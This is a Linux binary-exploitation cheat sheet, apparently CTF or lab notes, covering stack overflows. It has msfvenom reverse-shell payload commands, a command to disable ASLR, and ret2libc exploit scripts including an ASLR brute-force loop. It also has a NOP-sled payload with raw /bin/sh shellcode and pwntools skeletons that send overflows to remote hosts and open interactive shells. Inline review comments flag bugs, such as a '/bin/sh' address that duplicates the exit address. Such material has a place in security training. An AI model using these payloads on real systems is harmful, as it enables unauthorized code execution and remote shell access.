Linux
Very Basic
# -----------| General Purpose Registers (32bit)
EAX # Arithmetic and Logical Instructions
EBX # Base Pointer for Memory Addresses
ECX # Loop, Shift, Rotation Counter
EDX # I/O Port Addressing, Multiplication, Division
ESI # Pointer of data and source in string copy operations (Source Index)
EDI # Pointer of data and destination in string copy operations (Destination Index)
# -----------| Stack (32bit)
ESP # The Stack Pointer (Store pointers)
EBP # The Base Pointer
EIP # The Instruction Pointer (holds the address of the next instruction to execute)
Create shell code
# -----------| Windows
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26...BAD_CHARS"
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26...BAD_CHARS"
# -----------| Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c -b "\x00"
00. Basic Checks
# -----------| CPU architecture information
lscpu
# -----------| I4-64 System Calls
cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h
# -----------| checksec info
checksec <FileName>
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled <-- the stack is not executable, so we can't drop shellcode on it and jump to it; use ret2libc instead
PIE: No PIE (0x8048000)
# -----------| Disable ASLR (Address Space Layout Randomization)
echo 0 > /proc/sys/kernel/randomize_va_space
# -----------| Create pattern
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
# -----------| Check offset value
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP_VALUE>
Get all functions
readelf -s BasicOne | grep FUNC
01. ret2libc (NX enabled)
# -----------| Check whether ASLR is on (does the libc address change between runs?)
for i in {1..20}; do ldd <FileName> | grep libc; done
Return to
libc
** [ ASLR OFF ]**
import struct
# Builds a 32-bit ret2libc payload for the ASLR-off case and writes it to stdout.
# Python 2 script: `print payload` is a print statement (a SyntaxError under Python 3)
# and a str is concatenated directly with struct.pack() output (bytes in Python 3).
# pwndbg + create cyclic + find offset
# 52 bytes of filler reach the saved return address (offset found with the cyclic pattern).
junk = "A"*52
# ldd <FileName>| grep libc <-- find the libc
# Load address of libc as shown by ldd; only meaningful while ASLR is disabled
# (see "Disable ASLR" above) and for this particular libc build.
libc = 0xb7e19000
# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system@@GLI
# '<I' = 4-byte little-endian unsigned int, i.e. an i386 address. The offsets below
# were read from one specific libc.so.6 and must be re-derived for any other build.
system = struct.pack('<I', libc + 0x0003ada0)
# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep _exit@@GLIBC <-- It does not really matter
# Fills the slot system() returns to; _exit just makes the process end cleanly afterwards.
# NOTE: `exit` shadows the builtin of the same name (harmless in a throwaway script).
exit = struct.pack('<I',libc + 0x000b07c8)
# strings -atx /lib/i386-linux-gnu/libc.so.6 | grep 'bin/sh'
binsh =struct.pack('<I',libc + 0x0015ba0b)
# Standard 32-bit (cdecl) ret2libc frame: overwritten return address -> system,
# system's own return address -> exit, system's first argument -> "/bin/sh".
payload = junk + system + exit + binsh
# Python 2 print appends a newline after the payload bytes.
print payload
Return to
libc
[ ASLR ON (Bruteforce) ]
from subprocess import call
import struct
# Same 32-bit ret2libc chain as above, but with ASLR on: the libc base is guessed once
# and the target is simply re-run until the guess happens to match the current layout.
# Python 2 script (print statement); not runnable unmodified under Python 3.
# pwndbg + create cyclic + find offset
# Filler up to the saved return address (offset from the cyclic pattern).
junk = "A"*112
# ldd <FileName>| grep libc <-- find the libc
# One libc base observed with ldd. With ASLR on the real base differs from run to run,
# which is why the loop below keeps retrying with this fixed guess.
libc = 0xb75b8000
# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system@@GLI
# Offsets are specific to the libc build they were read from; '<I' packs a 4-byte LE address.
system = struct.pack('<I', libc + 0x00040310)
# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep _exit@@GLIBC <-- It does not really matter
# NOTE: `exit` shadows the builtin of the same name (harmless here).
exit = struct.pack('<I',libc + 0x00033290)
# strings -atx /lib/i386-linux-gnu/libc.so.6 | grep 'bin/sh'
binsh =struct.pack('<I',libc + 0x00162bac)
# Frame: return address -> system, system's return address -> exit, system's argument -> "/bin/sh".
buff = junk
buff += system
buff += exit
buff += binsh
# Re-run the target with the payload as argv[1] up to 513 times (the count is arbitrary);
# each run is a fresh process and therefore a fresh address-space layout.
# The original listing had the loop body unindented; it belongs inside the loop.
for i in range(513):
    print "Trying: %s" %i
    # `ret` (the child's exit status) is never inspected, so the loop does not stop on success.
    # Replace "/programe/file/path" with the actual path of the vulnerable binary.
    ret = call(["/programe/file/path", buff])
02. NOP sled (NX disabled)
## ------------------| x86 Bit
# Classic stack-smash payload for the NX-disabled case: a NOP sled, 28 bytes of shellcode,
# and an overwritten return address that must point somewhere inside the sled.
# Python 2 script (print statement).
# Total number of bytes before the saved return address; derived from the crash offset.
BUF_SIZE = 362
# 28 bytes of x86 shellcode, split over four lines of 7 bytes each.
SHELL_CODE = "\x31\xc0\x50\x68\x2f\x2f\x73"
SHELL_CODE += "\x68\x68\x2f\x62\x69\x6e\x89"
SHELL_CODE += "\xe3\x89\xc1\x89\xc2\xb0\x0b"
SHELL_CODE += "\xcd\x80\x31\xc0\x40\xcd\x80"
# Placeholder: "?" is a single byte, not an address. Replace it with the 4 little-endian
# bytes of an address inside the sled, as in the example on this line.
EIP = "?" ## 0xbffff4c0 --> \xc0\xf4\xff\xbf
# Pad with NOPs so that NOP_SLED + SHELL_CODE is exactly BUF_SIZE bytes long.
NOP_SLED = "\x90"*(BUF_SIZE-len(SHELL_CODE))
payload = NOP_SLED + SHELL_CODE + EIP
# Python 2 print appends a trailing newline.
print payload
03. PWNtool Skeletons
ret2libc
(32 bit)
#!/usr/bin/python3
from pwn import *
# pwntools skeleton for a 32-bit ret2libc against a remote service. The addresses were
# read in a gdb session, so they only hold while the target runs the same libc with ASLR off.
# Tells pwntools which terminal to open when gdb.debug() spawns a debugger window.
context(terminal=['tmux','new-window'])
#context(os='linux', arch='i386')
# If the program is run in local mode
#programe = gdb.debug('./myapp','b main')
# If the program is run in remote mode
programe = remote('10.10.10.61',32812)
# 212 bytes of filler up to the saved return address; .encode() yields bytes for sendline().
junk = ("A" * 212).encode()
# run gdb once then CTRL+C to background it then type p system
system = p32(0xf7e4c060)
# type p exit on gdb
# NOTE: `exit` shadows the builtin of the same name (harmless in a throwaway script).
exit = p32(0xf7e3faf0)
# type find &system,+9999999,"sh" on gdb
# select one and then type x/s 0xf7f6ddd5
# NOTE(review): this is the same value as `exit` above, which looks like a copy-paste slip;
# the "/bin/sh" address found with the gdb commands above presumably belongs here — verify.
binsh = p32(0xf7e3faf0)
#programe.recvuntil('What do you want me to echo back?')
# Wait for the prompt, answer it, then send the overflow: junk + system + exit + binsh.
programe.recvuntil('Enter Bridge Access Code:')
programe.sendline("Something")
programe.sendline(junk + system + exit + binsh)
# Hand the connection over to the user.
programe.interactive()
from pwn import *
# pwntools skeleton for a 64-bit (amd64) ROP chain. Unlike the 32-bit skeleton above,
# both the local and the remote target are assigned to `programe` here, so the gdb.debug()
# session is started and then immediately replaced by the remote connection.
#context(terminal=['tmux','new-window'])
context(os='linux', arch='amd64')
# Load the program in local mode
# NOTE(review): comment out whichever of the next two assignments is not in use; as written
# the remote() call below overwrites this one and the local debug session is abandoned.
programe = gdb.debug('./myapp','b main')
# Load the program in remote mode
programe = remote('10.10.10.147',1337)
# 112 bytes of filler up to the saved return address.
junk = ("A" * 112).encode()
# NUL-terminated "/bin/sh" (8 bytes) sent as part of the overflow.
bin_sh = "/bin/sh\x00".encode()
# The 0x40xxxx values look like addresses inside a non-PIE amd64 binary; they do not
# survive a rebuild of the target and must be re-read for any other binary.
system = p64(0x40116e)
# Presumably a `pop r13; ret` gadget, going by the name — confirm in the disassembly.
pop_r13 = p64(0x401206)
null = p64(0x0)
test = p64(0x401152)
#programe.recvuntil('What do you want me to echo back?')
# Chain order as given: filler, "/bin/sh", pop_r13, system, two NUL qwords, test.
# NOTE(review): how the gadget feeds the string into system depends on the target — verify in gdb.
programe.sendline(junk + bin_sh + pop_r13 + system + null + null + test)
programe.interactive()
04. GDB
GDB-gef
# -----------| Load the program
gdb-gef ./myapp
# -----------| Run the program
run
r
# -----------| Create pattern
pattern create 200
# -----------| Search RSP or EIP
pattern search $rsp
pattern search $eip
pattern search qaaa
pattern search 0x00007fffffffe288
# -----------| Show registers
registers
GDB-Peda
# -----------| Load the program
gdb-peda ./myapp
# -----------| Run the program
run
r
# -----------| Get the address of system (!! run the program before querying this)
p system
# -----------| Get the address of the /bin/sh string inside libc (!! run the program before querying this)
searchmem /bin/sh
# -----------| Get the address of exit
p exit
05. OBJDump
objdump -D myapp | grep system